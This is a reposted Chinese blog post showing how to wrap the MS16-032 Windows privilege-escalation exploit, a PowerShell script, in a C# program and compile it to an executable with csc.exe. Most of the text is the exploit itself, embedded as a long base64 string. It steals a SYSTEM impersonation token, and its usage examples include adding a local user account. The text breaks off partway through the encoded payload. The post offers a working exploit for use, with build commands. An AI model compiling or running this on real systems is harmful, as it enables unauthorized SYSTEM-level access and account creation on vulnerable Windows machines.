转载

编译你的 PowerShell（以 MS16-032 为例）

授人以鱼不如授人以渔

之前的 MS16-032 是个 PowerShell 脚本，怎样改成 exe 呢？很简单：使用 .NET 稍作修改并编译即可。已经改好的代码在这里：

戳我

gist貌似被墙了,我在这里也贴一下:

/* Author: Evilcg, Twitter: @Evilcg Step One: PS C:/> [psobject].Assembly.Location C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.Management.Automation.dll Step Two: C:/Windows/Microsoft.NET/Framework/v4.0.30319/csc.exe  /reference:"C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.Management.Automation.dll" /out:MS16_032.exe MS16_032.cs */  // Windows 10 reference may be Here: C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35 using System; using System.IO; using System.Collections.Generic; using System.Collections.ObjectModel; using System.Text; using System.Threading.Tasks; using System.Management.Automation; using System.Management.Automation.Host; using System.Management.Automation.Runspaces;  namespace ConsoleApplication1 {     class Program     {         static string _application;         static string _commandline;         static int Main(string[] args)         {              if (args.Length == 0)             {                 System.Console.WriteLine("Usage: MS16_032.exe calc.exe OR MS16_032.exe cmd.exe /"/c clac.exe/"");                 return 1;             }              else if (args.Length ==1)             {                  _application = args[0];                          PowerShellExecutor t = new PowerShellExecutor();                 t.ExecuteSynchronously(_application, "");             }             else if(args.Length == 2)             {                 _application = args[0];                 _commandline = args[1];                 PowerShellExecutor t = new PowerShellExecutor();                 t.ExecuteSynchronously(_application, _commandline);             }             return 0;                      }     }      class PowerShellExecutor     {         public static string PSInvoke_MS16_032 = 
System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@"ZnVuY3Rpb24gSW52b2tlLU1TMTYtMDMyIHsKPCMKLlNZTk9QU0lTCiAgICAKICAgIFBvd2VyU2hlbGwgaW1wbGVtZW50YXRpb24gb2YgTVMxNi0wMzIuIFRoZSBleHBsb2l0IHRhcmdldHMgYWxsIHZ1bG5lcmFibGUKICAgIG9wZXJhdGluZyBzeXN0ZW1zIHRoYXQgc3VwcG9ydCBQb3dlclNoZWxsIHYyKy4gQ3JlZGl0IGZvciB0aGUgZGlzY292ZXJ5IG9mCiAgICB0aGUgYnVnIGFuZCB0aGUgbG9naWMgdG8gZXhwbG9pdCBpdCBnbyB0byBKYW1lcyBGb3JzaGF3IChAdGlyYW5pZGRvKS4KICAgIAogICAgVGFyZ2V0czoKICAgIAogICAgKiBXaW43LVdpbjEwICYgMms4LTJrMTIgPD09IDMyLzY0IGJpdCEKICAgICogVGVzdGVkIG9uIHgzMiBXaW43LCB4NjQgV2luOCwgeDY0IDJrMTJSMgogICAgCiAgICBOb3RlczoKICAgIAogICAgKiBJbiBvcmRlciBmb3IgdGhlIHJhY2UgY29uZGl0aW9uIHRvIHN1Y2NlZWQgdGhlIG1hY2hpbmUgbXVzdCBoYXZlIDIrIENQVQogICAgICBjb3Jlcy4gSWYgdGVzdGluZyBpbiBhIFZNIGp1c3QgbWFrZSBzdXJlIHRvIGFkZCBhIGNvcmUgaWYgbmVlZGVkIG1rYXkuCiAgICAqIFRoZSBleHBsb2l0IGlzIHByZXR0eSByZWxpYWJsZSwgaG93ZXZlciB+MS82IHRpbWVzIGl0IHdpbGwgc2F5IGl0IHN1Y2NlZWRlZAogICAgICBidXQgbm90IHNwYXduIGEgc2hlbGwuIE5vdCBzdXJlIHdoYXQgdGhlIGlzc3VlIGlzIGJ1dCBqdXN0IHJlLXJ1biBhbmQgcHJvZml0IQogICAgKiBXYW50IHRvIGtub3cgbW9yZSBhYm91dCBNUzE2LTAzMiA9PT4KICAgICAgaHR0cHM6Ly9nb29nbGVwcm9qZWN0emVyby5ibG9nc3BvdC5jby51ay8yMDE2LzAzL2V4cGxvaXRpbmctbGVha2VkLXRocmVhZC1oYW5kbGUuaHRtbAoKLkRFU0NSSVBUSU9OCiAgICBBdXRob3I6IFJ1YmVuIEJvb25lbiAoQEZ1enp5U2VjKQogICAgQmxvZzogaHR0cDovL3d3dy5mdXp6eXNlY3VyaXR5LmNvbS8KICAgIExpY2Vuc2U6IEJTRCAzLUNsYXVzZQogICAgUmVxdWlyZWQgRGVwZW5kZW5jaWVzOiBQb3dlclNoZWxsIHYyKwogICAgT3B0aW9uYWwgRGVwZW5kZW5jaWVzOiBOb25lCgouUEFSQU1FVEVSIEFwcGxpY2F0aW9uCgpTcGVjaWZpZXMgYW4gQXBwbGljYXRpb24gdG8gcnVuLgoKLlBBUkFNRVRFUiBDb21tYW5kbGluZQoKU3BlY2lmaWVzIENvbW1hbmRsaW5lLCBzdWNoIGFzIG5ldCB1c2VyIHh4eCB4eHggL2FkZAogICAgCi5FWEFNUExFCiAgICBDOlxQUz4gSW52b2tlLU1TMTYtMDMyIC1BcHBsaWNhdGlvbiBDOlxXaW5kb3dzXFN5c3RlbTMyXGNtZC5leGUKICAgIEM6XFBTPiBJbnZva2UtTVMxNi0wMzIgLUFwcGxpY2F0aW9uIEM6XFdpbmRvd3NcU3lzdGVtMzJcY21kLmV4ZSAtQ29tbWFuZGxpbmUgIi9jIG5ldCB1c2VyIDEgMSAvYWRkIgoKIz4KICBbQ21kbGV0QmluZGluZygpXQogICAgcGFyYW0oCiAgICAgICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkRm
Fsc2UsIFBhcmFtZXRlclNldE5hbWUgPSAnQzpcV2luZG93c1xTeXN0ZW0zMlxjbWQuZXhlJyApXQogICAgICAgIFtzdHJpbmddCiAgICAgICAgJEFwcGxpY2F0aW9uLAoKICAgICAgICBbUGFyYW1ldGVyKE1hbmRhdG9yeSA9ICRGYWxzZSldCiAgICAgICAgW3N0cmluZ10KICAgICAgICAkQ29tbWFuZGxpbmUKICAgICAgICApCgoKICAgIEFkZC1UeXBlIC1UeXBlRGVmaW5pdGlvbiBAIgogICAgdXNpbmcgU3lzdGVtOwogICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgdXNpbmcgU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbDsKICAgIAogICAgW1N0cnVjdExheW91dChMYXlvdXRLaW5kLlNlcXVlbnRpYWwpXQogICAgcHVibGljIHN0cnVjdCBQUk9DRVNTX0lORk9STUFUSU9OCiAgICB7CiAgICAgICAgcHVibGljIEludFB0ciBoUHJvY2VzczsKICAgICAgICBwdWJsaWMgSW50UHRyIGhUaHJlYWQ7CiAgICAgICAgcHVibGljIGludCBkd1Byb2Nlc3NJZDsKICAgICAgICBwdWJsaWMgaW50IGR3VGhyZWFkSWQ7CiAgICB9CiAgICAKICAgIFtTdHJ1Y3RMYXlvdXQoTGF5b3V0S2luZC5TZXF1ZW50aWFsLCBDaGFyU2V0PUNoYXJTZXQuVW5pY29kZSldCiAgICBwdWJsaWMgc3RydWN0IFNUQVJUVVBJTkZPCiAgICB7CiAgICAgICAgcHVibGljIEludDMyIGNiOwogICAgICAgIHB1YmxpYyBzdHJpbmcgbHBSZXNlcnZlZDsKICAgICAgICBwdWJsaWMgc3RyaW5nIGxwRGVza3RvcDsKICAgICAgICBwdWJsaWMgc3RyaW5nIGxwVGl0bGU7CiAgICAgICAgcHVibGljIEludDMyIGR3WDsKICAgICAgICBwdWJsaWMgSW50MzIgZHdZOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd1hTaXplOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd1lTaXplOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd1hDb3VudENoYXJzOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd1lDb3VudENoYXJzOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd0ZpbGxBdHRyaWJ1dGU7CiAgICAgICAgcHVibGljIEludDMyIGR3RmxhZ3M7CiAgICAgICAgcHVibGljIEludDE2IHdTaG93V2luZG93OwogICAgICAgIHB1YmxpYyBJbnQxNiBjYlJlc2VydmVkMjsKICAgICAgICBwdWJsaWMgSW50UHRyIGxwUmVzZXJ2ZWQyOwogICAgICAgIHB1YmxpYyBJbnRQdHIgaFN0ZElucHV0OwogICAgICAgIHB1YmxpYyBJbnRQdHIgaFN0ZE91dHB1dDsKICAgICAgICBwdWJsaWMgSW50UHRyIGhTdGRFcnJvcjsKICAgIH0KICAgIAogICAgW1N0cnVjdExheW91dChMYXlvdXRLaW5kLlNlcXVlbnRpYWwpXQogICAgcHVibGljIHN0cnVjdCBTUU9TCiAgICB7CiAgICAgICAgcHVibGljIGludCBMZW5ndGg7CiAgICAgICAgcHVibGljIGludCBJbXBlcnNvbmF0aW9uTGV2ZWw7CiAgICAgICAgcHVibGljIGludCBDb250ZXh0VHJhY2tpbmdNb2RlOwogICAgICAgIHB1YmxpYyBib29sIEVmZmVjdGl2ZU9ubHk7CiAgICB9CiAgICAKICAgIHB1YmxpYy
BzdGF0aWMgY2xhc3MgQWR2YXBpMzIKICAgIHsKICAgICAgICBbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSwgQ2hhclNldD1DaGFyU2V0LlVuaWNvZGUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgQ3JlYXRlUHJvY2Vzc1dpdGhMb2dvblcoCiAgICAgICAgICAgIFN0cmluZyB1c2VyTmFtZSwKICAgICAgICAgICAgU3RyaW5nIGRvbWFpbiwKICAgICAgICAgICAgU3RyaW5nIHBhc3N3b3JkLAogICAgICAgICAgICBpbnQgbG9nb25GbGFncywKICAgICAgICAgICAgU3RyaW5nIGFwcGxpY2F0aW9uTmFtZSwKICAgICAgICAgICAgU3RyaW5nIGNvbW1hbmRMaW5lLAogICAgICAgICAgICBpbnQgY3JlYXRpb25GbGFncywKICAgICAgICAgICAgaW50IGVudmlyb25tZW50LAogICAgICAgICAgICBTdHJpbmcgY3VycmVudERpcmVjdG9yeSwKICAgICAgICAgICAgcmVmICBTVEFSVFVQSU5GTyBzdGFydHVwSW5mbywKICAgICAgICAgICAgb3V0IFBST0NFU1NfSU5GT1JNQVRJT04gcHJvY2Vzc0luZm9ybWF0aW9uKTsKICAgICAgICAgICAgCiAgICAgICAgW0RsbEltcG9ydCgiYWR2YXBpMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgU2V0VGhyZWFkVG9rZW4oCiAgICAgICAgICAgIHJlZiBJbnRQdHIgVGhyZWFkLAogICAgICAgICAgICBJbnRQdHIgVG9rZW4pOwogICAgICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBPcGVuVGhyZWFkVG9rZW4oCiAgICAgICAgICAgIEludFB0ciBUaHJlYWRIYW5kbGUsCiAgICAgICAgICAgIGludCBEZXNpcmVkQWNjZXNzLAogICAgICAgICAgICBib29sIE9wZW5Bc1NlbGYsCiAgICAgICAgICAgIG91dCBJbnRQdHIgVG9rZW5IYW5kbGUpOwogICAgICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBPcGVuUHJvY2Vzc1Rva2VuKAogICAgICAgICAgICBJbnRQdHIgUHJvY2Vzc0hhbmRsZSwgCiAgICAgICAgICAgIGludCBEZXNpcmVkQWNjZXNzLAogICAgICAgICAgICByZWYgSW50UHRyIFRva2VuSGFuZGxlKTsKICAgICAgICAgICAgCiAgICAgICAgW0RsbEltcG9ydCgiYWR2YXBpMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBleHRlcm4gc3RhdGljIGJvb2wgRHVwbGljYXRlVG9rZW4oCiAgICAgICAgICAgIEludFB0ciBFeGlzdGluZ1Rva2VuSGFuZGxlLAogICAgICAgICAgICBpbnQgU0VDVVJJVFlfSU1QRVJTT05BVElPTl9MRVZFTCwKICAgICAgICAgICAgcmVmIEludFB0ciBEdXBsaWNhdGVUb2tlbkhhbmRsZSk7CiAgICB9CiAgICAKICAgIHB1YmxpYyBzdGF0aWMgY2xhc3MgS2VybmVsMzIKICAgIHsKICAgICAgIC
BbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiKV0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiB1aW50IEdldExhc3RFcnJvcigpOwogICAgCiAgICAgICAgW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRDdXJyZW50UHJvY2VzcygpOwogICAgCiAgICAgICAgW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRDdXJyZW50VGhyZWFkKCk7CiAgICAgICAgCiAgICAgICAgW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBHZXRUaHJlYWRJZChJbnRQdHIgaFRocmVhZCk7CiAgICAgICAgCiAgICAgICAgW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yID0gdHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gaW50IEdldFByb2Nlc3NJZE9mVGhyZWFkKEludFB0ciBoYW5kbGUpOwogICAgICAgIAogICAgICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBTdXNwZW5kVGhyZWFkKEludFB0ciBoVGhyZWFkKTsKICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLFNldExhc3RFcnJvcj10cnVlKV0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgUmVzdW1lVGhyZWFkKEludFB0ciBoVGhyZWFkKTsKICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBUZXJtaW5hdGVQcm9jZXNzKAogICAgICAgICAgICBJbnRQdHIgaFByb2Nlc3MsCiAgICAgICAgICAgIHVpbnQgdUV4aXRDb2RlKTsKICAgIAogICAgICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsIFNldExhc3RFcnJvcj10cnVlKV0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIENsb3NlSGFuZGxlKEludFB0ciBoT2JqZWN0KTsKICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBEdXBsaWNhdGVIYW5kbGUoCiAgICAgICAgICAgIEludFB0ciBoU291cmNlUHJvY2Vzc0hhbmRsZSwKICAgICAgICAgICAgSW50UHRyIGhTb3VyY2VIYW5kbGUsCiAgICAgICAgICAgIEludFB0ciBoVGFyZ2V0UHJvY2Vzc0hhbmRsZSwKICAgICAgICAgICAgcmVmIEludFB0ciBscFRhcmdldEhhbmRsZSwKICAgICAgICAgICAgaW50IGR3RGVzaXJlZEFjY2VzcywKICAgICAgICAgICAgYm9vbCBiSW5oZXJpdEhhbmRsZSwKICAgICAgICAgICAgaW50IGR3T3B0aW9ucyk7CiAgICB9CiAgICAKIC
AgIHB1YmxpYyBzdGF0aWMgY2xhc3MgTnRkbGwKICAgIHsKICAgICAgICBbRGxsSW1wb3J0KCJudGRsbC5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gaW50IE50SW1wZXJzb25hdGVUaHJlYWQoCiAgICAgICAgICAgIEludFB0ciBUaHJlYWRIYW5kbGUsCiAgICAgICAgICAgIEludFB0ciBUaHJlYWRUb0ltcGVyc29uYXRlLAogICAgICAgICAgICByZWYgU1FPUyBTZWN1cml0eVF1YWxpdHlPZlNlcnZpY2UpOwogICAgfQoiQAoKICAgIGZ1bmN0aW9uIEdldC1UaHJlYWRIYW5kbGUgewogICAgICAgICMgU3RhcnR1cEluZm8gU3RydWN0CiAgICAgICAgJFN0YXJ0dXBJbmZvID0gTmV3LU9iamVjdCBTVEFSVFVQSU5GTwogICAgICAgICRTdGFydHVwSW5mby5kd0ZsYWdzID0gMHgwMDAwMDEwMSAjIFNUQVJURl9VU0VTVERIQU5ETEVTCiAgICAgICAgICAgICRTdGFydHVwSW5mby53U2hvd1dpbmRvdyA9IDA7CiAgICAgICAgJFN0YXJ0dXBJbmZvLmhTdGRJbnB1dCA9IFtLZXJuZWwzMl06OkdldEN1cnJlbnRUaHJlYWQoKQogICAgICAgICRTdGFydHVwSW5mby5oU3RkT3V0cHV0ID0gW0tlcm5lbDMyXTo6R2V0Q3VycmVudFRocmVhZCgpCiAgICAgICAgJFN0YXJ0dXBJbmZvLmhTdGRFcnJvciA9IFtLZXJuZWwzMl06OkdldEN1cnJlbnRUaHJlYWQoKQogICAgICAgICRTdGFydHVwSW5mby5jYiA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OlNpemVPZigkU3RhcnR1cEluZm8pICMgU3RydWN0IFNpemUKICAgICAgICAKICAgICAgICAjIFByb2Nlc3NJbmZvIFN0cnVjdAogICAgICAgICRQcm9jZXNzSW5mbyA9IE5ldy1PYmplY3QgUFJPQ0VTU19JTkZPUk1BVElPTgogICAgICAgIAogICAgICAgICMgQ3JlYXRlUHJvY2Vzc1dpdGhMb2dvblcgLS0+IGxwQ3VycmVudERpcmVjdG9yeQogICAgICAgICRHZXRDdXJyZW50UGF0aCA9IChHZXQtSXRlbSAtUGF0aCAiLlwiIC1WZXJib3NlKS5GdWxsTmFtZQogICAgICAgIAogICAgICAgICMgTE9HT05fTkVUQ1JFREVOVElBTFNfT05MWSAvIENSRUFURV9TVVNQRU5ERUQKICAgICAgICAkQ2FsbFJlc3VsdCA9IFtBZHZhcGkzMl06OkNyZWF0ZVByb2Nlc3NXaXRoTG9nb25XKAogICAgICAgICAgICAidXNlciIsICJkb21haW4iLCAicGFzcyIsCiAgICAgICAgICAgIDB4MDAwMDAwMDIsICJDOlxXaW5kb3dzXFN5c3RlbTMyXG5vdGVwYWQuZXhlIiwgIiIsCiAgICAgICAgICAgIDB4MDAwMDAwMDQsICRudWxsLCAkR2V0Q3VycmVudFBhdGgsCiAgICAgICAgICAgIFtyZWZdJFN0YXJ0dXBJbmZvLCBbcmVmXSRQcm9jZXNzSW5mbykKICAgICAgICAKICAgICAgICAjIER1cGxpY2F0ZSBoYW5kbGUgaW50byBjdXJyZW50IHByb2Nlc3MgLT4gRFVQTElDQVRFX1NBTUVfQUNDRVNTCiAgICAgICAgJGxwVGFyZ2V0SGFuZGxlID0gW0ludFB0cl06Olplcm8KICAgICAgICAkQ2FsbFJlc3VsdCA9IFtLZXJuZWwzMl06OkR1cGxpY2F0ZUhhbmRsZS
gKICAgICAgICAgICAgJFByb2Nlc3NJbmZvLmhQcm9jZXNzLCAweDQsCiAgICAgICAgICAgIFtLZXJuZWwzMl06OkdldEN1cnJlbnRQcm9jZXNzKCksCiAgICAgICAgICAgIFtyZWZdJGxwVGFyZ2V0SGFuZGxlLCAwLCAkZmFsc2UsCiAgICAgICAgICAgIDB4MDAwMDAwMDIpCiAgICAgICAgCiAgICAgICAgIyBDbGVhbiB1cCBzdXNwZW5kZWQgcHJvY2VzcwogICAgICAgICRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6VGVybWluYXRlUHJvY2VzcygkUHJvY2Vzc0luZm8uaFByb2Nlc3MsIDEpCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFByb2Nlc3MpCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFRocmVhZCkKICAgICAgICAKICAgICAgICAkbHBUYXJnZXRIYW5kbGUKICAgIH0KICAgIAogICAgZnVuY3Rpb24gR2V0LVN5c3RlbVRva2VuIHsKICAgICAgICBlY2hvICJgbls/XSBUcnlpbmcgdGhyZWFkIGhhbmRsZTogJFRocmVhZCIKICAgICAgICBlY2hvICJbP10gVGhyZWFkIGJlbG9uZ3MgdG86ICQoJChHZXQtUHJvY2VzcyAtUElEICQoW0tlcm5lbDMyXTo6R2V0UHJvY2Vzc0lkT2ZUaHJlYWQoJFRocmVhZCkpKS5Qcm9jZXNzTmFtZSkiCiAgICAKICAgICAgICAkQ2FsbFJlc3VsdCA9IFtLZXJuZWwzMl06OlN1c3BlbmRUaHJlYWQoJFRocmVhZCkKICAgICAgICBpZiAoJENhbGxSZXN1bHQgLW5lIDApIHsKICAgICAgICAgICAgZWNobyAiWyFdICRUaHJlYWQgaXMgYSBiYWQgdGhyZWFkLCBtb3Zpbmcgb24uLiIKICAgICAgICAgICAgUmV0dXJuCiAgICAgICAgfSBlY2hvICJbK10gVGhyZWFkIHN1c3BlbmRlZCIKICAgICAgICAKICAgICAgICBlY2hvICJbPl0gV2lwaW5nIGN1cnJlbnQgaW1wZXJzb25hdGlvbiB0b2tlbiIKICAgICAgICAkQ2FsbFJlc3VsdCA9IFtBZHZhcGkzMl06OlNldFRocmVhZFRva2VuKFtyZWZdJFRocmVhZCwgW0ludFB0cl06Olplcm8pCiAgICAgICAgaWYgKCEkQ2FsbFJlc3VsdCkgewogICAgICAgICAgICBlY2hvICJbIV0gU2V0VGhyZWFkVG9rZW4gZmFpbGVkLCBtb3Zpbmcgb24uLiIKICAgICAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpSZXN1bWVUaHJlYWQoJFRocmVhZCkKICAgICAgICAgICAgZWNobyAiWytdIFRocmVhZCByZXN1bWVkISIKICAgICAgICAgICAgUmV0dXJuCiAgICAgICAgfQogICAgICAgIAogICAgICAgIGVjaG8gIls+XSBCdWlsZGluZyBTWVNURU0gaW1wZXJzb25hdGlvbiB0b2tlbiIKICAgICAgICAjIFNlY3VyaXR5UXVhbGl0eU9mU2VydmljZSBzdHJ1Y3QKICAgICAgICAkU1FPUyA9IE5ldy1PYmplY3QgU1FPUwogICAgICAgICRTUU9TLkltcGVyc29uYXRpb25MZXZlbCA9IDIgI1NlY3VyaXR5SW1wZXJzb25hdGlvbgogICAgICAgICRTUU9TLkxlbmd0aCA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OlNpemVPZigkU1
FPUykKICAgICAgICAjIFVuZG9jdW1lbnRlZCBBUEkncywgSSBsaWtlIHlvdXIgc3R5bGUgTWljcm9zb2Z0IDspCiAgICAgICAgJENhbGxSZXN1bHQgPSBbTnRkbGxdOjpOdEltcGVyc29uYXRlVGhyZWFkKCRUaHJlYWQsICRUaHJlYWQsIFtyZWZdJHNxb3MpCiAgICAgICAgaWYgKCRDYWxsUmVzdWx0IC1uZSAwKSB7CiAgICAgICAgICAgIGVjaG8gIlshXSBOdEltcGVyc29uYXRlVGhyZWFkIGZhaWxlZCwgbW92aW5nIG9uLi4iCiAgICAgICAgICAgICRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6UmVzdW1lVGhyZWFkKCRUaHJlYWQpCiAgICAgICAgICAgIGVjaG8gIlsrXSBUaHJlYWQgcmVzdW1lZCEiCiAgICAgICAgICAgIFJldHVybgogICAgICAgIH0KICAgIAogICAgICAgICRzY3JpcHQ6U3lzVG9rZW5IYW5kbGUgPSBbSW50UHRyXTo6WmVybwogICAgICAgICMgMHgwMDA2IC0tPiBUT0tFTl9EVVBMSUNBVEUgLWJvciBUT0tFTl9JTVBFUlNPTkFURQogICAgICAgICRDYWxsUmVzdWx0ID0gW0FkdmFwaTMyXTo6T3BlblRocmVhZFRva2VuKCRUaHJlYWQsIDB4MDAwNiwgJGZhbHNlLCBbcmVmXSRTeXNUb2tlbkhhbmRsZSkKICAgICAgICBpZiAoISRDYWxsUmVzdWx0KSB7CiAgICAgICAgICAgIGVjaG8gIlshXSBPcGVuVGhyZWFkVG9rZW4gZmFpbGVkLCBtb3Zpbmcgb24uLiIKICAgICAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpSZXN1bWVUaHJlYWQoJFRocmVhZCkKICAgICAgICAgICAgZWNobyAiWytdIFRocmVhZCByZXN1bWVkISIKICAgICAgICAgICAgUmV0dXJuCiAgICAgICAgfQogICAgICAgIAogICAgICAgIGVjaG8gIls/XSBTdWNjZXNzLCBvcGVuIFNZU1RFTSB0b2tlbiBoYW5kbGU6ICRTeXNUb2tlbkhhbmRsZSIKICAgICAgICBlY2hvICJbK10gUmVzdW1pbmcgdGhyZWFkLi4iCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpSZXN1bWVUaHJlYWQoJFRocmVhZCkKICAgIH0KICAgIAogICAgIyBtYWluKCkgPC0tLSA7KQogICAgJG1zMTYwMzIgPSBAIgogICAgIF9fIF9fIF9fXyBfX18gICBfX18gICAgIF9fXyBfX18gX19fIAogICAgfCAgViAgfCAgX3xfICB8IHwgIF98X19ffCAgIHxfICB8XyAgfAogICAgfCAgICAgfF8gIHxffCB8X3wgLiB8X19ffCB8IHxfICB8ICBffAogICAgfF98X3xffF9fX3xfX19fX3xfX198ICAgfF9fX3xfX198X19ffAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICBbYnkgYjMzZiAtPiBARnV6enlTZWNdCiJACiAgICAKICAgICRtczE2MDMyCiAgICAKICAgICMgQ2hlY2sgbG9naWNhbCBwcm9jZXNzb3IgY291bnQsIHJhY2UgY29uZGl0aW9uIHJlcXVpcmVzIDIrCiAgICBlY2hvICJgbls/XSBPcGVyYXRpbmcgc3lzdGVtIGNvcmUgY291bnQ6ICQoW1N5c3RlbS5FbnZpcm9ubWVudF06OlByb2Nlc3NvckNvdW50KSIKICAgIGlmICgkKFtTeXN0ZW0uRW52aXJvbm1lbnRdOjpQcm9jZXNzb3JDb3VudCkgLWx0IDIpIH
sKICAgICAgICBlY2hvICJbIV0gVGhpcyBpcyBhIFZNIGlzbid0IGl0LCByYWNlIGNvbmRpdGlvbiByZXF1aXJlcyBhdCBsZWFzdCAyIENQVSBjb3JlcywgZXhpdGluZyFgbiIKICAgICAgICBSZXR1cm4KICAgIH0KICAgIAogICAgIyBDcmVhdGUgYXJyYXkgZm9yIFRocmVhZHMgJiBUSUQncwogICAgJFRocmVhZEFycmF5ID0gQCgpCiAgICAkVGlkQXJyYXkgPSBAKCkKICAgIAogICAgZWNobyAiWz5dIER1cGxpY2F0aW5nIENyZWF0ZVByb2Nlc3NXaXRoTG9nb25XIGhhbmRsZXMuLiIKICAgICMgTG9vcCBHZXQtVGhyZWFkSGFuZGxlIGFuZCBjb2xsZWN0IHRocmVhZCBoYW5kbGVzIHdpdGggYSB2YWxpZCBUSUQKICAgIGZvciAoJGk9MDsgJGkgLWx0IDUwMDsgJGkrKykgewogICAgICAgICRoVGhyZWFkID0gR2V0LVRocmVhZEhhbmRsZQogICAgICAgICRoVGhyZWFkSUQgPSBbS2VybmVsMzJdOjpHZXRUaHJlYWRJZCgkaFRocmVhZCkKICAgICAgICAjIEJpdCBoYWNreS9sYXp5LCBmaWx0ZXJzIG9uIHVuaXEvdmFsaWQgVElEJ3MgdG8gY3JlYXRlICRUaHJlYWRBcnJheQogICAgICAgIGlmICgkVGlkQXJyYXkgLW5vdGNvbnRhaW5zICRoVGhyZWFkSUQpIHsKICAgICAgICAgICAgJFRpZEFycmF5ICs9ICRoVGhyZWFkSUQKICAgICAgICAgICAgaWYgKCRoVGhyZWFkIC1uZSAwKSB7CiAgICAgICAgICAgICAgICAkVGhyZWFkQXJyYXkgKz0gJGhUaHJlYWQgIyBUaGlzIGlzIHdoYXQgd2UgbmVlZCEKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIH0KICAgIAogICAgaWYgKCQoJFRocmVhZEFycmF5Lmxlbmd0aCkgLWVxIDApIHsKICAgICAgICBlY2hvICJbIV0gTm8gdmFsaWQgdGhyZWFkIGhhbmRsZXMgd2VyZSBjYXB0dXJlZCwgZXhpdGluZyEiCiAgICAgICAgUmV0dXJuCiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIls/XSBEb25lLCBnb3QgJCgkVGhyZWFkQXJyYXkubGVuZ3RoKSB0aHJlYWQgaGFuZGxlKHMpISIKICAgICAgICBlY2hvICJgbls/XSBUaHJlYWQgaGFuZGxlIGxpc3Q6IgogICAgICAgICRUaHJlYWRBcnJheQogICAgfQogICAgCiAgICBlY2hvICJgblsqXSBTbmlmZmluZyBvdXQgcHJpdmlsZWdlZCBpbXBlcnNvbmF0aW9uIHRva2VuLi4iCiAgICBmb3JlYWNoICgkVG